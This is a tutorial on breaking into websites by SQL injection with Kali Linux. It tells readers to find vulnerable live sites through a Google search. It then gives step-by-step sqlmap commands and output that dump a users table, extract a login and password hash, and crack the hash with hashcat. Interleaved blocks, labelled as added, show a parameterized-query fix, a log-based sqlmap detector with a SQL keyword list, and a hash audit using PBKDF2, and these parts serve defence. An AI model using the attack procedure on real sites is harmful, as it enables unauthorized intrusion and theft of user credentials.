How to hack a website and database using Kali Linux

Procedure 1:

Hacking a website and getting its database details can be done only with a vulnerable website. To find these websites, type inurl php id=” in Google to get the sites.

Fire up the terminal and type the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
--dbs = Enumerate DBMS databases

This command reveals some information:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So, as you can see, there are two databases that we can look into. information_schema is a standard database on almost every MySQL server. As per the sqldummywebsite database.
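
Why the item_id parameter is injectable, and how the application side closes it, shown as an added example that is not from the original page. The in-memory SQLite table is constructed, and the function names and the published column are hypothetical.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the site's back-end database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE item (item_id INTEGER PRIMARY KEY, name TEXT, published INTEGER);
        INSERT INTO item VALUES (15, 'poster', 1), (16, 'mug', 1), (17, 'draft', 0);
    """)
    return db

def get_item_vulnerable(db, item_id):
    # Weak: the raw request parameter becomes part of the SQL text, so
    # whatever follows the number is parsed as SQL. This is the condition
    # sqlmap probes for.
    sql = "SELECT name FROM item WHERE published = 1 AND item_id = " + item_id
    return [row[0] for row in db.execute(sql)]

def get_item_safe(db, item_id):
    # Hardened: reject anything that is not a plain integer, then bind the
    # value as a parameter so it can never change the statement's structure.
    if not re.fullmatch(r"[0-9]{1,10}", item_id):
        raise ValueError("item_id must be an integer")
    sql = "SELECT name FROM item WHERE published = 1 AND item_id = ?"
    return [row[0] for row in db.execute(sql, (int(item_id),))]

def demo():
    db = make_db()
    tampered = "15 OR 1=1"   # constructed non-numeric parameter value
    leaked = sorted(get_item_vulnerable(db, tampered))
    try:
        get_item_safe(db, tampered)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected, get_item_safe(db, "15")

if __name__ == "__main__":
    print(demo())
```

With the concatenated query the tampered value returns every row, including the unpublished one; the hardened function rejects it before any SQL runs.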

Procedure 2:

List the tables of the target database using SQLMAP SQL Injection.
Now we need to know how many tables this sqldummywebsite database has and what their names are. To find that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Pretty good, this database has 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

And then, of course, we want to check inside the user_info table using SQLMAP SQL Injection, as that table probably contains usernames and passwords.

Procedure 3:

List the columns of the target table of the selected database using SQLMAP SQL Injection. We need to list all the columns of the target table user_info of the sqldummywebsite database. SQLMAP SQL Injection makes it really easy; run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
Our targets are the user_login and user_password columns.

Procedure 4:

List the usernames from the target column of the target table of the selected database using SQLMAP SQL Injection.
Now all we have to do is run the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Using this, we have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Procedure 5:

Now we have to extract the password from the target column of the target table of the selected database using SQLMAP SQL Injection.
Just use the command below to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
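
What the enumeration in Procedures 1 to 5 looks like from the server side, shown as an added example that is not from the original page: a log check that flags requests whose item_id is not a plain integer. The log lines are constructed, and the combined log format, keyword list and threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = '''\
198.51.100.7 - - [12/Mar/2024:10:55:50 +0000] "GET /cgi-bin/item.cgi?item_id=15 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:55:53 +0000] "GET /cgi-bin/item.cgi?item_id=15%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
203.0.113.9 - - [12/Mar/2024:10:55:56 +0000] "GET /cgi-bin/item.cgi?item_id=15%20UNION%20SELECT%20NULL HTTP/1.1" 200 498 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2024:10:56:20 +0000] "GET /cgi-bin/item.cgi?item_id=15%27 HTTP/1.1" 500 120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2024:10:56:30 +0000] "GET /cgi-bin/item.cgi?item_id=16 HTTP/1.1" 200 530 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
SQL_WORDS = re.compile(r"\b(union|select|sleep|benchmark|information_schema)\b", re.I)

def flag_request(line):
    """Return (client_ip, reasons) for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return None, []
    ip, target, agent = m.groups()
    reasons = []
    # The User-Agent is trivially changed, so treat it as a hint only.
    if "sqlmap" in agent.lower():
        reasons.append("sqlmap user-agent")
    # parse_qs percent-decodes, so encoded payloads are seen in clear text.
    for value in parse_qs(urlsplit(target).query).get("item_id", []):
        if not re.fullmatch(r"[0-9]+", value):
            reasons.append("non-numeric item_id")
        if SQL_WORDS.search(value):
            reasons.append("SQL keyword in item_id")
    return ip, reasons

def suspicious_clients(log_text, threshold=2):
    """Clients with at least `threshold` flagged requests."""
    hits = Counter()
    for line in log_text.splitlines():
        ip, reasons = flag_request(line)
        if reasons:
            hits[ip] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))
```

The non-numeric check is the durable signal here, because the parameter is supposed to be an integer and legitimate traffic never trips it.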

This is the hashed password. The password is stored in hashed form, so now we have to crack it.
Cracking it is covered extensively in Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux.

Procedure 6: Cracking password
Now we have the hashed password as 24iYBc17xK0e.

Procedure 6.a: Identify Hash type
Kali Linux provides a tool that we can use to identify which type of hash this is. On the command line, type the following command and paste the hash value at the prompt:
hash-identifier

So this is a DES(Unix) hash.

Procedure 6.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES

I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

So here’s the cracked password: abc123.
24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.
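
Why this hash fell to a wordlist, and what the user_password column should hold instead, shown as an added example that is not from the original page. DES(Unix) crypt uses a 12-bit salt and only the first 8 characters of the password; the audit below flags legacy formats by shape and stores new hashes with salted PBKDF2-HMAC-SHA256. The storage format string, iteration count and function names are assumptions.

```python
import base64
import hashlib
import hmac
import os
import re

# Shapes of legacy formats; a match means "looks like", not proof.
LEGACY = [
    ("DES(Unix) crypt", re.compile(r"[./0-9A-Za-z]{13}")),  # 2 salt + 11 hash chars
    ("unsalted MD5 hex", re.compile(r"[0-9a-fA-F]{32}")),
    ("unsalted SHA1 hex", re.compile(r"[0-9a-fA-F]{40}")),
]
SCHEME = "pbkdf2_sha256"

def classify(stored):
    """Name the storage format a hash string appears to use."""
    if stored.startswith(SCHEME + "$"):
        return SCHEME
    for name, pattern in LEGACY:
        if pattern.fullmatch(stored):
            return name
    return "unknown"

def hash_password(password, iterations=600_000):
    # Random 16-byte salt per user and a deliberately slow KDF, so one
    # wordlist pass cannot be reused across accounts or run cheaply.
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    enc = lambda b: base64.b64encode(b).decode()
    return f"{SCHEME}${iterations}${enc(salt)}${enc(dk)}"

def verify_password(password, stored):
    _, iterations, salt, dk = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), base64.b64decode(salt), int(iterations))
    # Constant-time comparison of the derived keys.
    return hmac.compare_digest(candidate, base64.b64decode(dk))

def audit(rows):
    """Return (login, format) for every row not yet on the current scheme."""
    return [(login, classify(h)) for login, h in rows if classify(h) != SCHEME]

if __name__ == "__main__":
    print(audit([("userX", "24iYBc17xK0e.")]))
```

Rows returned by audit() are candidates for rehashing at the user's next successful login; a slow KDF raises the cost of each guess but does not make a password like abc123 safe.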
